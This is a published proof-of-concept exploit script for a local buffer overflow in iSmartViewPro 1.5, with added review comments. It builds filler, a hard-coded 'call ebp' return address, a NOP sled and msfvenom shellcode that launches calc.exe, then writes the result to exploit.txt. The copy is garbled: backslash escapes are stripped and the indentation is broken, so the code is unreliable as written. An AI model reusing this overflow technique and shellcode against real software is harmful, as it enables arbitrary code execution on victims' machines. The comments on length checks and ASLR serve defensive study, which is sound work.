# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovery Date: 2018-08-12
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the
# iSmartViewPro 1.5 program and click on "System Setup" in the
# "Save Path for Snapshot and Record file" field. Paste the content of
# "exploit.txt" and click on Save. You will see a sweet calculator pop up.
# Greetz: @FuzzySec @LiveOverflow @hexachordanu @HansSecurity

#!/usr/bin/python

# Assembles the proof-of-concept string for the "Save Path for Snapshot and
# Record file" field, in this order:
#   buffer ("A" filler) + eip + nops + buf + pad ("B" filler)
# NOTE(review): as written in this copy the string literals below contain no
# backslash escapes, so they are plain ASCII text rather than raw byte values,
# and every len() call counts those text characters.
# Defender's view: the 272-character filler alone is longer than Windows
# MAX_PATH (260), so a length check on the path field would reject this input
# before it is copied anywhere -- presumably the missing check is the root
# cause; confirm against the application.
buffer = "A" * 272
#0x6a192c79 : call ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [avcodec-54.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:Program FilesiSmartViewProavcodec-54.dll)

# Value placed directly after the filler. The listing above ties it to a
# `call ebp` instruction at 0x6a192c79 inside avcodec-54.dll and reports ASLR,
# Rebase and SafeSEH as False for that module, which is what lets the script
# hard-code the address. A build of the bundled DLL with ASLR enabled would
# remove that assumption.
eip = "x79x2Cx19x6A"
# Twelve repetitions of the x90 token (0x90 is the x86 NOP opcode), placed
# between eip and buf.
nops = "x90" *12
#badchar x00x0ax0d
#msfvenom -p windows/exec cmd=calc.exe -b 'x00x0ax0d' -f python
# Output of the msfvenom command quoted above: a windows/exec payload that runs
# calc.exe, generated to avoid the listed bad characters. The calculator
# appearing is the visible sign that execution was redirected.
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
# Trailing "B" filler sized to bring the total to 600 characters. If the other
# parts already add up to more than 600, the multiplier is negative and pad is
# an empty string.
pad = "B" * (600 - len(eip) - len(buffer) - len(nops) - len(buf) )

# Concatenation order: filler, eip, nops, buf, pad.
payload = buffer + eip + nops + buf + pad
# Writes the assembled string to "exploit.txt" in the current working directory
# (text mode, overwriting any existing file) and prints its length.
# NOTE(review): in this copy the bodies of try/except carry no indentation, and
# the print statements use Python 2 syntax.
try:
f=open("exploit.txt","w")
# Reports len(payload): the character count of the string built above.
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
# Bare except: every failure, including ones unrelated to creating the file,
# is reported with the same message and the underlying error is discarded.
except:
print "File cannot be created"